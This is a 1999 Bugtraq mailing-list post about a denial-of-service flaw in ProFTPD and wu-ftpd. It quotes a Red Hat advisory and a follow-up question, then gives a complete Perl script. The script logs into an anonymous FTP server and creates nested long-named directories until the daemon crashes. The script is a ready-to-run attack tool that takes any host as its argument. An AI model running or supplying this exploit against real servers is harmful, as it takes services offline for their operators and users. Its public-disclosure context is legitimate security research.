Bugtraq mailing list archives

Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available

From: jkwilli2 () UNITY NCSU EDU (Ken Williams)
Date: Thu, 11 Feb 1999 18:49:37 -0500


On Thu, 11 Feb 1999, Ronald Wahl wrote:

Date: Thu, 11 Feb 1999 00:12:04 +0100
From: Ronald Wahl <rwahl () GMX NET>
To: BUGTRAQ () netspace org
Subject: Re: SECURITY: new wu-ftpd packages available (fwd)

On Tue, 9 Feb 1999, RHS Linux User wrote:

---------- Forwarded message ----------
Date: Tue, 9 Feb 1999 18:20:51 -0500 (EST)
From: Cynthia Dale <silly () redhat com>
To: cdale () home isolnet com
Subject: SECURITY: new wu-ftpd packages available (fwd)

fnord.

---------- Forwarded message ----------
Date: Tue, 9 Feb 1999 17:34:10 -0500
From: Bill Nottingham <notting () redhat com>
Reply-To: redhat-watch-list () redhat com
To: redhat-watch-list () redhat com
Subject: SECURITY: new wu-ftpd packages available
Resent-Date: 9 Feb 1999 22:56:28 -0000
Resent-From: redhat-watch-list () redhat com
Resent-cc: recipient list not shown: ;

A security vulnerability has been identified in all versions of the wu-ftpd
server binary shipped with Red Hat Linux. For more information, see
http://www.netect.com/advisory_0209.html

New packages are available for Red Hat Linux 4.2, 5.0, 5.1, and 5.2. All
users of Red Hat Linux are encouraged to upgrade to the new wu-ftpd releases
immediately. As always, these packages have been signed with the Red Hat PGP
key.


Is it possible that the bug is not fixed yet?

mkdir <verylongname> let the deamon do funny things. Can someone reproduce
this?

ron

--
\ Ronald Wahl --- rwahl () gmx net         \   Gib Gates keine Chance!   /
 \ WWW: http://www.tu-chemnitz.de/~row/  \                           /
  \ Talk: rwa () goliath csn tu-chemnitz de  \   Pinguine schuetzen.   /
   \ PGP key available                     \                       /


hi,

yes,

kills patched ProFTPD dead.

-----snip-----

#!/usr/local/bin/perl
# ftpd thingy
# bubba () bubba org
#
$login="ftp";              #duh
$pass="ftp\@ftp.com";  #ditto
$cdstart="incoming";   #dir with write access to start making new dirs
$length=100;           #length of dir names
$numdirs="15";         #number of dirs to create
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
        print "Usage: $0 <host>\n";
        exit;
}
use Socket;

$string="x" x $length;

my($remote,$port,$iaddr,$paddr,$proto,$line);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$count=$numdirs;
while ($count--) {
        if ($count==$numdirs-1) {
                $msg = "user $login\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";
                $msg = "pass $pass\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";
                $msg = "cwd $cdstart\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";
        } elsif ($count==1) {
            $msg = "pwd\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";
            $msg = "quit\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";
        } else {
            $msg = "mkd $string\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";
                $msg = "cwd $string\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";
                $msg = "pwd\n";
                send(SOCK, $msg, 0) or die "Cannot send query: $!";

        }
}
while (<SOCK>) {
        print;
}

exit;

-----snip-----


Ken Williams
jkwilli2 () csc ncsu edu

Packet Storm Security                 http://packetstorm.genocide2600.com/
Trinux: Linux Security Toolkit http://www.trinux.org/ ftp://ftp.trinux.org
PGP DH/DSS/RSA Public Keys     http://packetstorm.genocide2600.com/pgpkey/
E.H.A.P. VP & Head of Operations http://www.ehap.org/   tattooman () ehap org
NCSU Computer Science      http://www.csc.ncsu.edu/  jkwilli2 () csc ncsu edu

Current thread:

Re: Microsoft Access 97 Stores Database Password as Plaintext, (continued)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Fernald, Brian (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Sozni (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Ervin Fried (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext sozni () USA NET (Feb 08)
  - Pine _again_ :) Chris Evans (Feb 08)
  - Re: Microsoft Access 97 Stores Database Password as Plaintext Stephen M. Milton (Feb 08)
    - Re: Microsoft Access 97 Stores Database Password as Plaintext Jim Paris (Feb 09)
    - Re: Microsoft Access 97 Stores Database Password as Plaintext Jim Paris (Feb 09)
    - SECURITY: new wu-ftpd packages available (fwd) RHS Linux User (Feb 09)
    - Re: SECURITY: new wu-ftpd packages available (fwd) Ronald Wahl (Feb 10)
    - Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available Ken Williams (Feb 11)
  - Re: Microsoft Access 97 Stores Database Password as Plaintext Nick Lamb (Feb 08)
  - Re: Microsoft Access 97 Stores Database Password as Plaintext Ian Smith (Feb 10)
    - Re: Microsoft Access 97 Stores Database Password as Plaintext Billy Naylor (Feb 12)
    - Re: Microsoft Access 97 Stores Database Password as Plaintext Ian Smith (Feb 12)
    - Applets listening on Sockets in Java Tim Wright (Feb 12)
    - Applets listening on Sockets in Java Lincoln Stein (Feb 13)
    - Re: Applets listening on Sockets in Java Tim Wright (Feb 15)
    - palmetto.ftpd vulnerability clarification. Jordan Ritter (Feb 12)
    - Microsoft Security Bulletin (MS99-005) aleph1 () UNDERGROUND ORG (Feb 12)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Will Cox (Feb 09)

(Thread continues...)